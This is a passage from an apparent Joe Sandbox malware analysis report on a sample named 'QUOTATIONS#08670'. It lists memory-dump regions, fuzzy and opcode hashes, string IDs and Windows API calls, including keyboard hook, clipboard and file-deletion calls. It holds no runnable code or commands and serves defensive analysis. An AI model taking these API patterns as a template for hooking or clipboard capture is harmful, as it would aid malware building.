                                                          • GetCurrentThread.KERNEL32 ref: 06BCA0E3
                                                          • GetCurrentProcess.KERNEL32 ref: 06BCA120
                                                          • GetCurrentThreadId.KERNEL32 ref: 06BCA179
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: c4c3ffca1a963695400de213f77baa948213eb277461323f5c5b2f3ed70066ec
                                                          • Instruction ID: 30121b971b5be6a4499420129211289410378e5464cc048297035fbbcd83f38c
                                                          • Opcode Fuzzy Hash: c4c3ffca1a963695400de213f77baa948213eb277461323f5c5b2f3ed70066ec
                                                          • Instruction Fuzzy Hash: CF5155B09012098FDB94DFAAD948B9EBBF1FF48314F24845DE009BB3A0E7349944CB65

                                                          Control-flow Graph (rendered in the original report as an interactive basic-block graph with executed / not-executed colouring; the block and edge list is not reproduced here). Function at 06BE9198, basic blocks 6be9198-6be9ac5; no internal call and no Win32 API call annotated in the graph.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q$$_q$$_q
                                                          • API String ID: 0-1171383116
                                                          • Opcode ID: 737c719109d09b13af7de11781b91b6894fb2a6d496561f50aae2d77aea4e676
                                                          • Instruction ID: ee3c84c358961dbee803ad99a23b88744519807d02f89d382f6687caec2df08e
                                                          • Opcode Fuzzy Hash: 737c719109d09b13af7de11781b91b6894fb2a6d496561f50aae2d77aea4e676
                                                          • Instruction Fuzzy Hash: FB917B74B0020A9FDB54DF65D9507AEB3F2FF88300F1085A9C809EB398EB349C468B91

                                                          Control-flow Graph (rendered in the original report as an interactive basic-block graph with executed / not-executed colouring; the block and edge list is not reproduced here). Function at 06BECF90, basic blocks 6becf90-6bedaf0; internal calls to 6bedb05 and to 6be65e8 (the latter from three blocks); no Win32 API call annotated in the graph.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q$$_q
                                                          • API String ID: 0-2441406858
                                                          • Opcode ID: 4b75f58b6518cf42d48a76a28226608a9f449f5238a1878469cd4df04c004ad6
                                                          • Instruction ID: 90aa94bcde492ea74d3b05bf7c88e05a84e0608d4e6a4b159365844ef6511c55
                                                          • Opcode Fuzzy Hash: 4b75f58b6518cf42d48a76a28226608a9f449f5238a1878469cd4df04c004ad6
                                                          • Instruction Fuzzy Hash: C6625E70A00206DFCB55EF68D590A5DBBB2FF84304B208A79D0069F769DB75ED4ACB81

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fdq$XPdq$\Odq
                                                          • API String ID: 0-727959394
                                                          • Opcode ID: 4b119e7d6afb8ee9bf4e14beac0dfdf06ff957bc3a5f46caa404b90e5cd7c205
                                                          • Instruction ID: 6a8f4790e354f3d2d4b3b7420ce779eeaa1e310999a5b97a2cce9628eed8c8f6
                                                          • Opcode Fuzzy Hash: 4b119e7d6afb8ee9bf4e14beac0dfdf06ff957bc3a5f46caa404b90e5cd7c205
                                                          • Instruction Fuzzy Hash: 77619174F002099FEB549FA5C8147AEBBF2FB88700F20846AD506EB395DB758C45CB91

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: X!@$x!@
                                                          • API String ID: 0-2527372166
                                                          • Opcode ID: 7360e42aaa0bec4c3890b826805638290a8b7285d167839f1a5c5a52ae919660
                                                          • Instruction ID: 9897f953e80aca85ceb0afcedfe84453d920a7c419c95f10529eb080d27bfffd
                                                          • Opcode Fuzzy Hash: 7360e42aaa0bec4c3890b826805638290a8b7285d167839f1a5c5a52ae919660
                                                          • Instruction Fuzzy Hash: ED81CE71B002059FDB54EFA9E49069DB7B6EF88310F108579E50AEB355EB35AC468B80

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q
                                                          • API String ID: 0-458585787
                                                          • Opcode ID: ff4063b24b9d814acf79898c2a8dc7bae8c25f68803489d4adc0b93426330f89
                                                          • Instruction ID: ccd207bde038291b9b88d234993f4f28e97e0059f126251a8b472dec38dd7ba0
                                                          • Opcode Fuzzy Hash: ff4063b24b9d814acf79898c2a8dc7bae8c25f68803489d4adc0b93426330f89
                                                          • Instruction Fuzzy Hash: 43514D74B101069FDB54DF74D990BAEB7F2EB88610F108579C40AEB399EB349C46CB91
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573832065.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1460000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26bb3e9831a7e41fd027c1b090cbdf201aceb1057b6e92d6bf5f717a304c68e2
                                                          • Instruction ID: 7e5b6e14cef64762dd6a0ce929743a473d6396dfd29ec49ea1fbf9b1e4fd38e0
                                                          • Opcode Fuzzy Hash: 26bb3e9831a7e41fd027c1b090cbdf201aceb1057b6e92d6bf5f717a304c68e2
                                                          • Instruction Fuzzy Hash: 14410F72E0034A8FDB04DFA9D80439EFBF5EF89310F15866AD505A7291DB34A845CBE1
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BC65EA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 1f18291564dc4de453f7c47cf73f2519e9e4a47d6ae48504c9aafbee76db1798
                                                          • Instruction ID: aef8d1b630e638e6f76c453106bd1cd80d3493e801748f7ad353bf56d68ffccf
                                                          • Opcode Fuzzy Hash: 1f18291564dc4de453f7c47cf73f2519e9e4a47d6ae48504c9aafbee76db1798
                                                          • Instruction Fuzzy Hash: 3151CEB1D003099FDB14CF99C984ADEBBB2FF48310F24812EE919AB210E7759985CF90
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BC65EA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 7c7f2a16dc24c27393b0e7edb516fd7cac1c54a76e2f11b6185334e5c1ac7a6c
                                                          • Instruction ID: 240163b3701bca13cde3df11ab06086e72677b72e9fdf81194229d1a1fabf14a
                                                          • Opcode Fuzzy Hash: 7c7f2a16dc24c27393b0e7edb516fd7cac1c54a76e2f11b6185334e5c1ac7a6c
                                                          • Instruction Fuzzy Hash: 3441CEB1D003099FDB14CF9AC884ADEBBB5FF48310F24812EE919AB210D7719945CF90
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 06BCB5D9
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 5ffe9af03839855a3614e3e07a3591cb4f59da78c9b6fa53f0abb9a221667358
                                                          • Instruction ID: 43ad2f86a66f47969b79febbb8fcb0090a7b1aaf3ff71d2d97e577f40b2ea54a
                                                          • Opcode Fuzzy Hash: 5ffe9af03839855a3614e3e07a3591cb4f59da78c9b6fa53f0abb9a221667358
                                                          • Instruction Fuzzy Hash: 244128B59002098FDB54CF99C449AAEFBF5FB88324F248499D519A7321D335A940CBA0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Clipboard
                                                          • String ID:
                                                          • API String ID: 220874293-0
                                                          • Opcode ID: 7ad19fd1e82d4884c031da61d962ad3ff4c14ca1614a7753545b63e47273df09
                                                          • Instruction ID: b5df861c37994d363d3330e72a149051edff8dfe2b6aea46fa9b874b5222a966
                                                          • Opcode Fuzzy Hash: 7ad19fd1e82d4884c031da61d962ad3ff4c14ca1614a7753545b63e47273df09
                                                          • Instruction Fuzzy Hash: 89311FB0D00209DFDB50CF99C985B9EBBF5EB08314F208099E008AB390D7B4AA44CFA5
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Clipboard
                                                          • String ID:
                                                          • API String ID: 220874293-0
                                                          • Opcode ID: f260796df4d2ae57cae9a0123a42bfd1a714b26d8bf51b53a9947c94df9de5af
                                                          • Instruction ID: 6fcdf67a945a71dd5f3d3d38ee37c4fd9588ab02bb6264d981e10d729fe6566b
                                                          • Opcode Fuzzy Hash: f260796df4d2ae57cae9a0123a42bfd1a714b26d8bf51b53a9947c94df9de5af
                                                          • Instruction Fuzzy Hash: B4311FB0D00209DFDB50CF98C984B9EBBF1AB08314F208099E008BB3A0D7749A45CF61
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 06BCBD6D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: 63c0d02497da550018f349094c994f3a46c6d022819351a993dc29f864cf2aba
                                                          • Instruction ID: e40a60014f92fd538319a183da44537cb07400acbac417cec038a6adccb81b6b
                                                          • Opcode Fuzzy Hash: 63c0d02497da550018f349094c994f3a46c6d022819351a993dc29f864cf2aba
                                                          • Instruction Fuzzy Hash: 48215CB18107888FCB60DFA9D64679EBFF4EF09324F14489ED449A7251C379A549CBA0
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06BCA2F7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 9c4b31f39fd8be920c8dd29638bc8d5f1a7f5d4da56e1ac6df51f901523f2863
                                                          • Instruction ID: 1bc8340bd27a8430eb6fd2847db1be5f1535cbb760d18e99a4e4cc9149d3e39f
                                                          • Opcode Fuzzy Hash: 9c4b31f39fd8be920c8dd29638bc8d5f1a7f5d4da56e1ac6df51f901523f2863
                                                          • Instruction Fuzzy Hash: 0221E4B5D002489FDB10CFAAD984ADEBBF4EB48320F14841AE918B3350D374A944CFA0
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06BCA2F7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 012983f367969b8811cb396c6d6847e0b03665cb64f94e7a81350a69ae374134
                                                          • Instruction ID: eac65fbef55d08f54bcdf19bd7b148d608cf941e8d98c068af1ddf38981a07c5
                                                          • Opcode Fuzzy Hash: 012983f367969b8811cb396c6d6847e0b03665cb64f94e7a81350a69ae374134
                                                          • Instruction Fuzzy Hash: 4921E6B5D002489FDB10CFA9D584ADEBFF5EB48310F14845AE954B7350D3749A55CF60
                                                          APIs
                                                          • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06BCDCA3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: HookWindows
                                                          • String ID:
                                                          • API String ID: 2559412058-0
                                                          • Opcode ID: ed4fda615aeda0bdee07b5751e12a4243d22cf96c90698ea50a14b788f827757
                                                          • Instruction ID: 4904a1001b2f095867ba6f95ea49382da9a5a3629fd04c388b481def60ffd39a
                                                          • Opcode Fuzzy Hash: ed4fda615aeda0bdee07b5751e12a4243d22cf96c90698ea50a14b788f827757
                                                          • Instruction Fuzzy Hash: EB2113B5D002099FCB54DFAAD844BEEFBF5EF88320F10842AE419A7250C775A945CFA1
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000), ref: 014680A8
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573832065.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1460000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: 2d8590e66bafe0d49129ac7d735cbc34f61021aebb398cdb5da56a140f60c1dc
                                                          • Instruction ID: 7ccb593082261e3761c7da362a68e72274d8889932c93311297ff0992ed90977
                                                          • Opcode Fuzzy Hash: 2d8590e66bafe0d49129ac7d735cbc34f61021aebb398cdb5da56a140f60c1dc
                                                          • Instruction Fuzzy Hash: E82174B1C0065A8FCB10CFAAC5447EEFBB4EF48320F15856AD818B7251D338A941CFA1
                                                          APIs
                                                          • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06BCDCA3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: HookWindows
                                                          • String ID:
                                                          • API String ID: 2559412058-0
                                                          • Opcode ID: 1a64e9930e6c473712712bb03dd04064c295f2ea3b9df8053281494ee18b3a28
                                                          • Instruction ID: cd46792ef4803c0b47aa5a8a1c19cec5705e24bf9afabeeea4d95df3b2670b71
                                                          • Opcode Fuzzy Hash: 1a64e9930e6c473712712bb03dd04064c295f2ea3b9df8053281494ee18b3a28
                                                          • Instruction Fuzzy Hash: 1C2124B5D002099FCB54DFAAC844BEEFBF5EF88320F10842AD419A7250C775A944CFA1
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000), ref: 014680A8
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573832065.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1460000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: 65cc2f1865b7996836198e8f1a79fa7029b3ea3fe3c0d7b062e7bad8407b075e
                                                          • Instruction ID: f56c43501dc2b9d8ba739ad95a531d96f25c0bd99b383fc5ccfe0c72e9c2b45f
                                                          • Opcode Fuzzy Hash: 65cc2f1865b7996836198e8f1a79fa7029b3ea3fe3c0d7b062e7bad8407b075e
                                                          • Instruction Fuzzy Hash: C11133B1C0061A9BCB14DF9AC544AAEFBF4EF48320F15852AD918B7250D379A944CFA1
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 0146EE5F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573832065.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1460000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID:
                                                          • API String ID: 1890195054-0
                                                          • Opcode ID: fea4c5be568327b4ff2726065958c16ba3b5f33a4fdf70627959e7b8f6e639f8
                                                          • Instruction ID: 9bde6b072bdc37a2c45ef47f6829d230891c7015200fe18195a93fb73012d1e3
                                                          • Opcode Fuzzy Hash: fea4c5be568327b4ff2726065958c16ba3b5f33a4fdf70627959e7b8f6e639f8
                                                          • Instruction Fuzzy Hash: CF1123B1C002599FCB10DFAAC544BDEFBF4AF48320F15812AD918B7250D378A944CFA1
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 06BCBD6D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: f97c2bfb48b01e063cb21517448c9f6c408015c444a40f9afba9640befdc7f59
                                                          • Instruction ID: ce88eac0a5975aa953bb2e4feb15d3d7cdd3763846f70750363964479ee37174
                                                          • Opcode Fuzzy Hash: f97c2bfb48b01e063cb21517448c9f6c408015c444a40f9afba9640befdc7f59
                                                          • Instruction Fuzzy Hash: 8E1143B0C043488FDB60DF9AC449B9EBBF8EB08320F20845EE609A7211D375A940CFA5
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 06BC5496
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 00f828131218e271f3a1e0661886e2ab7e34fe7209cbf08c421c4b3fef9029f9
                                                          • Instruction ID: a47a2fd3d8460129e99dc634882f6d4b97173435e65e821a3a416623e85c823b
                                                          • Opcode Fuzzy Hash: 00f828131218e271f3a1e0661886e2ab7e34fe7209cbf08c421c4b3fef9029f9
                                                          • Instruction Fuzzy Hash: D51132B2C003088FDB60DF9AC444A9EFBF4EB88320F10846ED818B7210C374A655CFA0
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 06BC5496
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 87693712097749ea92ae11ae1c50eb6cab7426bfeda02913ab492021c7850928
                                                          • Instruction ID: 90cd6dbaea190c19a4151827d059155b96fb9c99a9f9fa9089e399d77841387a
                                                          • Opcode Fuzzy Hash: 87693712097749ea92ae11ae1c50eb6cab7426bfeda02913ab492021c7850928
                                                          • Instruction Fuzzy Hash: 6C1113B6C002498FDB60DF9AD444ADEFBF4EF88320F15845AD419B7210D379A645CFA1
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06BCB825), ref: 06BCB8AF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 478845e1c271333721044a5c98d448e8a551085dad0b84bb494eddd8469d1c60
                                                          • Instruction ID: bab828072ca2054a87343ce7a1469edd321d771b875ef3d9734be2a952603f8c
                                                          • Opcode Fuzzy Hash: 478845e1c271333721044a5c98d448e8a551085dad0b84bb494eddd8469d1c60
                                                          • Instruction Fuzzy Hash: F61103B18042498FDB50DF9AD445BDEBBF4EB48320F20845AD519B7250D375A944CFA5
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 06BCBD6D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: 715613c20425c707136ac8002317faafeb4c8761291875b277af9d2a70daaf37
                                                          • Instruction ID: def1faa7073d30e59b1910d34d51971568e51f2fdd92bba647b4e2cde0ef987a
                                                          • Opcode Fuzzy Hash: 715613c20425c707136ac8002317faafeb4c8761291875b277af9d2a70daaf37
                                                          • Instruction Fuzzy Hash: E71112B18003488FDB60DF9AD549BDEBBF4EB48320F20845AE519B7210D375AA44CFA5
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 06BCBD6D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: 701b8787fde153ec328bf425309e35acc70cabacfa566b7756b8d1114121c8de
                                                          • Instruction ID: 2f6570305f7d519d20cd81de5c8c8cd86c1fab230aeff5a17c6427af5cc1c813
                                                          • Opcode Fuzzy Hash: 701b8787fde153ec328bf425309e35acc70cabacfa566b7756b8d1114121c8de
                                                          • Instruction Fuzzy Hash: 9D1112B5C002488FCB60DFA9D549BDEBBF4EB48320F24885AD559B7210C375AA45CFA1
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06BCB825), ref: 06BCB8AF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 7d625dda2d152f16d96f28e1abda436c14443d49f46e8b650dec79179cfe7e49
                                                          • Instruction ID: 0fba88d0cc352ef214a04ea6f787b76e1b3dcc6e6b173badfb205d5fd6c3d461
                                                          • Opcode Fuzzy Hash: 7d625dda2d152f16d96f28e1abda436c14443d49f46e8b650dec79179cfe7e49
                                                          • Instruction Fuzzy Hash: BB1100B5800249CFCB20DF99D949BDEBBF4EB48324F20845AD518B7350C375A944CFA4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: XPdq
                                                          • API String ID: 0-1708276200
                                                          • Opcode ID: 0342c74f73c8b125e10a5099fbf42a71698ad6d7a809e3e2633bd863b3580933
                                                          • Instruction ID: 68fe2d9a80402bacfdd3877030af3724b960a3f6a646b7c732dd2887695518fb
                                                          • Opcode Fuzzy Hash: 0342c74f73c8b125e10a5099fbf42a71698ad6d7a809e3e2633bd863b3580933
                                                          • Instruction Fuzzy Hash: 51416E74F002099FEB559FA5C804B9EBBF6FF88700F20856AD115AB3A5DB744C05CB90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH_q
                                                          • API String ID: 0-2397113591
                                                          • Opcode ID: ed129c626ff13c22eb47d0053f6f81ac627cdf06971a93163a00648f940c8945
                                                          • Instruction ID: 65c9d3ef2f3e71d2ed53d2c3d66d63bf23e322ab8faf813e81368d6713fc7ca7
                                                          • Opcode Fuzzy Hash: ed129c626ff13c22eb47d0053f6f81ac627cdf06971a93163a00648f940c8945
                                                          • Instruction Fuzzy Hash: 8B41BDB4F0020A9FDB64DF75D4506AEBBB2FF85340F108569E406EB354EBB49846CB81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH_q
                                                          • API String ID: 0-2397113591
                                                          • Opcode ID: 9e59612220411f0e44d4cd513aa33a4cf6e71b988124d2fb0858099e98ff16a1
                                                          • Instruction ID: ca6ac3ea8daad68d7a1be2349f61b5c7a2129bb5db0ee48893917c03ee10c57f
                                                          • Opcode Fuzzy Hash: 9e59612220411f0e44d4cd513aa33a4cf6e71b988124d2fb0858099e98ff16a1
                                                          • Instruction Fuzzy Hash: 9031EF70B102018FDB699F74D51466E7BA6EF89300F2485B9E406DB3A5DF78DE02CBA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH_q
                                                          • API String ID: 0-2397113591
                                                          • Opcode ID: 716200d87d4066da13b8465ab89c84ad00df772d25e4fd2edede4c87bcbbe115
                                                          • Instruction ID: f1bd834b000d3585e44f2271f98746ef97ee53d2d2fc8c6f73239ce77b6db142
                                                          • Opcode Fuzzy Hash: 716200d87d4066da13b8465ab89c84ad00df772d25e4fd2edede4c87bcbbe115
                                                          • Instruction Fuzzy Hash: 8D31EF70B102058FDB689F74D51066E7BE6EB89600B208578D406DB399DF39DE02CBA1
                                                          Strings
                                                          Memory Dump Source
